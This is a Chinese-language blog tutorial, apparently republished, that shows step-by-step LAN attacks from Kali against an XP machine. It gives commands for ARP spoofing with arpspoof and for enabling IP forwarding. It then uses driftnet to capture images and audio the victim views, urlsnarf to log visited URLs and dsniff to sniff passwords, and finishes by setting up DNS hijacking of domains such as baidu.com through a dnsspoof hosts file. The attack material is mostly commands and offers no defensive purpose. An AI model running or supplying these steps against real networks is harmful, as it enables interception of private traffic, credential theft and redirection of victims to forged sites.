局域网下ARP欺骗、嗅探,以及DNS欺骗

kali ip:192.168.14.157

目标ip:192.168.14.158

目标网关:192.168.14.2

 

ARP欺骗:
arpspoof -t 目标ip -r 目标网关

命令:arpspoof  -i  eth0 -t 192.168.14.158 -r 192.168.14.2

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 我们可以看到xp认为网关的MAC地址和KAli是一样的

显示我们欺骗成功

但现在xp是不能上网的

kali 默认不会开启流量转发

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

我们在xp下是不能上网的

 

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 打开流量转发的功能:

查看(默认kali没有开启流量转发功能,值为0)

命令:cat /proc/sys/net/ipv4/ip_forward

局域网下ARP欺骗、嗅探,以及DNS欺骗

默认值为0

 

开启流量转发

 命令:echo 1 > /proc/sys/net/ipv4/ip_forward

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 我们回来看kali是否能上网

能上网

 

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 网络嗅探

 

窃取浏览中的图片:

命令:driftnet -i eth0

会打开一个窗口

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 

我们去xp浏览网站

再看看效果

可以看到浏览过的网页照片都在这里显示

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 还可以抓取声音文件

你也可以把图片放到一起,放到一个目录下

新建目录:
mkdir 目录名

-例如 mkdir tempdir/ 

把抓的图片保存到目录:
-driftnet -i eth0 -a -d tempdir/ -s(声音文件)

 

 

抓传输过程浏览的url:

命令:urlsnarf -i eth0

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 

嗅探密码:

命令:dsniff -i eth0 -m

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 

局域网下ARP欺骗、嗅探,以及DNS欺骗

 

 

DNS欺骗(域名劫持)

 

你也可以进行域名劫持,让对方访问一个网站解析到不准确或者伪造的网站上

你需要自己配制欺骗的域名

本人没有找到自带的域名集

只能自己编辑

格式:

伪造网站ip  *.baidu.com
伪造网站ip  *.google.com.hk

 

查看:cat /usr/share/dsniff/dnsspoof.hosts

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpjwyj.html